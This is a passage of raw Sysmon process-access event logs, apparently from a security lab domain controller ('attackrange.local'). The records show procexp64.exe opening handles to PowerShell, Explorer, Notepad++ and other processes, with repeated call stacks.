1d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789207Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789206Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789205Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789204Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789203Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789202Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789201Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789200Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789199Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789198Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789197Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789196Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789195Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789194Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789193Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789192Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789191Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789190Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files 